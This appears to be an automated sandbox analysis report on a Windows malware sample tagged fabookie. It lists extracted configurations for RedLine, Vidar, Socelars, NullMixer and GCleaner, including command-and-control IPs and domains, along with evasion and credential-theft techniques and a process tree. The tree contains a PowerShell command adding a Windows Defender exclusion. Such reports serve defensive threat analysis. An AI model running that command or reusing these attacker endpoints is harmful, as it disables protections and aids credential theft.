fabookie | 07b3cf92babb177664467ac45682fe71f3835b6f8533868885297f1143e2ee4f

Analysis

max time kernel
92s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
18-08-2024 14:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe
Size

7.1MB
MD5

a712cc20b6de80a3a0e5e3575fd8eca7
SHA1

5f4e7c064aeaa93440580ccfd9fab019ad5035eb
SHA256

07b3cf92babb177664467ac45682fe71f3835b6f8533868885297f1143e2ee4f
SHA512

151486d9a2cda3671d36752ca582ebaf839cf9e2c99e31abb1b9268ef369c5fd41a481b608de838b480a88f2a8a21f6a745043f32799fa1418b7c6a77957be62
SSDEEP

196608:xlLUCgequxql7wD6ypMupfPDIc/7Iv7yO7I4peAjG:xddgetMl7wphpfn7izI8fG

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

redline

Botnet

ANI

45.142.215.47:27643

Extracted

Family

nullmixer

http://hsiens.xyz/

Extracted

Family

redline

Botnet

jamesfuck

65.108.20.195:6774

Extracted

Family

vidar

Version

41.1

Botnet

706

https://mas.to/@bardak1ho

Attributes

profile_id
706

Extracted

Family

gcleaner

gcl-page.biz

194.145.227.161

Signatures

Detect Fabookie payload 1 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023459-90.dat	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

resource	yara_rule
behavioral2/memory/1068-144-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral2/memory/1412-170-0x00000000023E0000-0x0000000002404000-memory.dmp	family_redline
behavioral2/memory/1412-169-0x0000000002190000-0x00000000021B6000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 4 IoCs

resource	yara_rule
behavioral2/memory/3200-129-0x00000000007E0000-0x000000000104E000-memory.dmp	family_sectoprat
behavioral2/memory/1068-144-0x0000000000400000-0x0000000000422000-memory.dmp	family_sectoprat
behavioral2/memory/1412-170-0x00000000023E0000-0x0000000002404000-memory.dmp	family_sectoprat
behavioral2/memory/1412-169-0x0000000002190000-0x00000000021B6000-memory.dmp	family_sectoprat

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 1 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023456-112.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Wed20a5199a94f4fab.exe

OnlyLogger payload 3 IoCs

resource	yara_rule
behavioral2/memory/4712-245-0x0000000000400000-0x000000000046F000-memory.dmp	family_onlylogger
behavioral2/memory/4712-280-0x0000000000400000-0x000000000046F000-memory.dmp	family_onlylogger
behavioral2/memory/4712-327-0x0000000000400000-0x000000000046F000-memory.dmp	family_onlylogger

Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral2/memory/540-237-0x0000000000400000-0x00000000004D7000-memory.dmp	family_vidar

Blocklisted process makes network request 1 IoCs

flow	pid	Process
132	4992	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1476	powershell.exe

ASPack v2.12-2.42 3 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x0007000000023449-48.dat	aspack_v212_v242
behavioral2/files/0x000700000002344b-58.dat	aspack_v212_v242
behavioral2/files/0x0007000000023448-51.dat	aspack_v212_v242

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Wed20a5199a94f4fab.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Wed20a5199a94f4fab.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Wed2002a84690b72.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	SkVPVS3t6Y8W.EXe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	rundll32.exe

Executes dropped EXE 20 IoCs

pid	Process
2388	setup_install.exe
2460	Wed206c3c41799770a5.exe
4524	Wed2025b8746422.exe
1412	Wed20be9c370a7.exe
4604	Wed20c5a083533c.exe
3200	Wed20a5199a94f4fab.exe
4804	Wed20adc033d42.exe
1280	Wed209332277a1.exe
4144	Wed20669c12bac107e.exe
1740	Wed20e918c3fc.exe
540	Wed209992677e6.exe
1836	Wed2002a84690b72.exe
4712	Wed205f46b56e52065.exe
1004	Wed20dd154a18517.exe
2372	Wed20ada9a0ea5a37a5a.exe
1784	Wed2025b8746422.tmp
1068	Wed20e918c3fc.exe
4768	SkVPVS3t6Y8W.EXe
5656	e589aa5.exe
5976	e58d481.exe

Loads dropped DLL 10 IoCs

pid	Process
2388	setup_install.exe
2388	setup_install.exe
2388	setup_install.exe
2388	setup_install.exe
2388	setup_install.exe
2388	setup_install.exe
1784	Wed2025b8746422.tmp
1880	rundll32.exe
1880	rundll32.exe
4992	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x0007000000023455-94.dat	themida
behavioral2/memory/3200-129-0x00000000007E0000-0x000000000104E000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Wed20a5199a94f4fab.exe

Drops Chrome extension 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json	Wed20ada9a0ea5a37a5a.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
47	iplogger.org
117	pastebin.com
118	pastebin.com
29	iplogger.org
30	iplogger.org
35	iplogger.org

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3200	Wed20a5199a94f4fab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1740 set thread context of 1068	1740	Wed20e918c3fc.exe	124

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 16 IoCs

pid	pid_target	Process	procid_target
1980	2388	WerFault.exe	87
2936	1004	WerFault.exe	120
3120	540	WerFault.exe	116
2624	4712	WerFault.exe	117
1772	4712	WerFault.exe	117
2040	4712	WerFault.exe	117
2280	4712	WerFault.exe	117
4084	4712	WerFault.exe	117
1360	4712	WerFault.exe	117
3860	4712	WerFault.exe	117
5116	4712	WerFault.exe	117
4532	4712	WerFault.exe	117
5720	5656	WerFault.exe	189
6024	5976	WerFault.exe	192
5708	4712	WerFault.exe	117
5820	4712	WerFault.exe	117

System Location Discovery: System Language Discovery 1 TTPs 49 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed20669c12bac107e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed209992677e6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed20be9c370a7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SkVPVS3t6Y8W.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed2025b8746422.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed20e918c3fc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	control.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed209332277a1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed2002a84690b72.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed20ada9a0ea5a37a5a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e589aa5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed20e918c3fc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed20dd154a18517.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed205f46b56e52065.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e58d481.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed2025b8746422.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed20adc033d42.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wed20a5199a94f4fab.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed20dd154a18517.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed20dd154a18517.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed20dd154a18517.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
4756	taskkill.exe
4056	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133684661796825900"	chrome.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3200	Wed20a5199a94f4fab.exe
3200	Wed20a5199a94f4fab.exe
1476	powershell.exe
1476	powershell.exe
1476	powershell.exe
1440	chrome.exe
1440	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4712	Wed205f46b56e52065.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2460	Wed206c3c41799770a5.exe
Token: SeCreateTokenPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeAssignPrimaryTokenPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeLockMemoryPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeIncreaseQuotaPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeMachineAccountPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeTcbPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeSecurityPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeTakeOwnershipPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeLoadDriverPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeSystemProfilePrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeSystemtimePrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeProfSingleProcessPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeIncBasePriorityPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeCreatePagefilePrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeCreatePermanentPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeBackupPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeRestorePrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeShutdownPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeDebugPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeAuditPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeSystemEnvironmentPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeChangeNotifyPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeRemoteShutdownPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeUndockPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeSyncAgentPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeEnableDelegationPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeManageVolumePrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeImpersonatePrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeCreateGlobalPrivilege	2372	Wed20ada9a0ea5a37a5a.exe
Token: 31	2372	Wed20ada9a0ea5a37a5a.exe
Token: 32	2372	Wed20ada9a0ea5a37a5a.exe
Token: 33	2372	Wed20ada9a0ea5a37a5a.exe
Token: 34	2372	Wed20ada9a0ea5a37a5a.exe
Token: 35	2372	Wed20ada9a0ea5a37a5a.exe
Token: SeDebugPrivilege	1280	Wed209332277a1.exe
Token: SeDebugPrivilege	1476	powershell.exe
Token: SeDebugPrivilege	4056	taskkill.exe
Token: SeDebugPrivilege	4756	taskkill.exe
Token: SeShutdownPrivilege	1440	chrome.exe
Token: SeCreatePagefilePrivilege	1440	chrome.exe
Token: SeShutdownPrivilege	1440	chrome.exe
Token: SeCreatePagefilePrivilege	1440	chrome.exe
Token: SeShutdownPrivilege	1440	chrome.exe
Token: SeCreatePagefilePrivilege	1440	chrome.exe
Token: SeShutdownPrivilege	1440	chrome.exe
Token: SeCreatePagefilePrivilege	1440	chrome.exe
Token: SeShutdownPrivilege	1440	chrome.exe
Token: SeCreatePagefilePrivilege	1440	chrome.exe
Token: SeShutdownPrivilege	1440	chrome.exe
Token: SeCreatePagefilePrivilege	1440	chrome.exe
Token: SeShutdownPrivilege	1440	chrome.exe
Token: SeCreatePagefilePrivilege	1440	chrome.exe
Token: SeShutdownPrivilege	1440	chrome.exe
Token: SeCreatePagefilePrivilege	1440	chrome.exe
Token: SeShutdownPrivilege	1440	chrome.exe
Token: SeCreatePagefilePrivilege	1440	chrome.exe
Token: SeShutdownPrivilege	1440	chrome.exe
Token: SeCreatePagefilePrivilege	1440	chrome.exe
Token: SeShutdownPrivilege	1440	chrome.exe
Token: SeCreatePagefilePrivilege	1440	chrome.exe
Token: SeShutdownPrivilege	1440	chrome.exe
Token: SeCreatePagefilePrivilege	1440	chrome.exe
Token: SeShutdownPrivilege	1440	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe
1440	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2984 wrote to memory of 2388	2984	a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe	87
PID 2984 wrote to memory of 2388	2984	a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe	87
PID 2984 wrote to memory of 2388	2984	a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe	87
PID 2388 wrote to memory of 4376	2388	setup_install.exe	91
PID 2388 wrote to memory of 4376	2388	setup_install.exe	91
PID 2388 wrote to memory of 4376	2388	setup_install.exe	91
PID 2388 wrote to memory of 3620	2388	setup_install.exe	92
PID 2388 wrote to memory of 3620	2388	setup_install.exe	92
PID 2388 wrote to memory of 3620	2388	setup_install.exe	92
PID 2388 wrote to memory of 3240	2388	setup_install.exe	93
PID 2388 wrote to memory of 3240	2388	setup_install.exe	93
PID 2388 wrote to memory of 3240	2388	setup_install.exe	93
PID 2388 wrote to memory of 968	2388	setup_install.exe	94
PID 2388 wrote to memory of 968	2388	setup_install.exe	94
PID 2388 wrote to memory of 968	2388	setup_install.exe	94
PID 2388 wrote to memory of 2740	2388	setup_install.exe	95
PID 2388 wrote to memory of 2740	2388	setup_install.exe	95
PID 2388 wrote to memory of 2740	2388	setup_install.exe	95
PID 2388 wrote to memory of 884	2388	setup_install.exe	96
PID 2388 wrote to memory of 884	2388	setup_install.exe	96
PID 2388 wrote to memory of 884	2388	setup_install.exe	96
PID 2388 wrote to memory of 3204	2388	setup_install.exe	97
PID 2388 wrote to memory of 3204	2388	setup_install.exe	97
PID 2388 wrote to memory of 3204	2388	setup_install.exe	97
PID 2388 wrote to memory of 1564	2388	setup_install.exe	98
PID 2388 wrote to memory of 1564	2388	setup_install.exe	98
PID 2388 wrote to memory of 1564	2388	setup_install.exe	98
PID 2388 wrote to memory of 60	2388	setup_install.exe	99
PID 2388 wrote to memory of 60	2388	setup_install.exe	99
PID 2388 wrote to memory of 60	2388	setup_install.exe	99
PID 2388 wrote to memory of 2920	2388	setup_install.exe	100
PID 2388 wrote to memory of 2920	2388	setup_install.exe	100
PID 2388 wrote to memory of 2920	2388	setup_install.exe	100
PID 2388 wrote to memory of 1232	2388	setup_install.exe	101
PID 2388 wrote to memory of 1232	2388	setup_install.exe	101
PID 2388 wrote to memory of 1232	2388	setup_install.exe	101
PID 2388 wrote to memory of 4968	2388	setup_install.exe	102
PID 2388 wrote to memory of 4968	2388	setup_install.exe	102
PID 2388 wrote to memory of 4968	2388	setup_install.exe	102
PID 2388 wrote to memory of 4444	2388	setup_install.exe	103
PID 2388 wrote to memory of 4444	2388	setup_install.exe	103
PID 2388 wrote to memory of 4444	2388	setup_install.exe	103
PID 2388 wrote to memory of 4808	2388	setup_install.exe	104
PID 2388 wrote to memory of 4808	2388	setup_install.exe	104
PID 2388 wrote to memory of 4808	2388	setup_install.exe	104
PID 2388 wrote to memory of 2040	2388	setup_install.exe	105
PID 2388 wrote to memory of 2040	2388	setup_install.exe	105
PID 2388 wrote to memory of 2040	2388	setup_install.exe	105
PID 3620 wrote to memory of 2460	3620	cmd.exe	106
PID 3620 wrote to memory of 2460	3620	cmd.exe	106
PID 2740 wrote to memory of 4524	2740	cmd.exe	107
PID 2740 wrote to memory of 4524	2740	cmd.exe	107
PID 2740 wrote to memory of 4524	2740	cmd.exe	107
PID 3240 wrote to memory of 1412	3240	cmd.exe	108
PID 3240 wrote to memory of 1412	3240	cmd.exe	108
PID 3240 wrote to memory of 1412	3240	cmd.exe	108
PID 968 wrote to memory of 4604	968	cmd.exe	109
PID 968 wrote to memory of 4604	968	cmd.exe	109
PID 4376 wrote to memory of 1476	4376	cmd.exe	110
PID 4376 wrote to memory of 1476	4376	cmd.exe	110
PID 4376 wrote to memory of 1476	4376	cmd.exe	110
PID 884 wrote to memory of 3200	884	cmd.exe	111
PID 884 wrote to memory of 3200	884	cmd.exe	111
PID 884 wrote to memory of 3200	884	cmd.exe	111

C:\Users\Admin\AppData\Local\Temp\a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a712cc20b6de80a3a0e5e3575fd8eca7_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2984
- C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4376
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed206c3c41799770a5.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3620
  - - C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed206c3c41799770a5.exe
      Wed206c3c41799770a5.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed20be9c370a7.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3240
  - - C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed20be9c370a7.exe
      Wed20be9c370a7.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed20c5a083533c.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed20c5a083533c.exe
      Wed20c5a083533c.exe
      4⤵
      Executes dropped EXE
      PID:4604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed2025b8746422.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2740
  - - C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed2025b8746422.exe
      Wed2025b8746422.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4524
    - - C:\Users\Admin\AppData\Local\Temp\is-0TRQK.tmp\Wed2025b8746422.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-0TRQK.tmp\Wed2025b8746422.tmp" /SL5="$D0052,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed2025b8746422.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed20a5199a94f4fab.exe
    3⤵
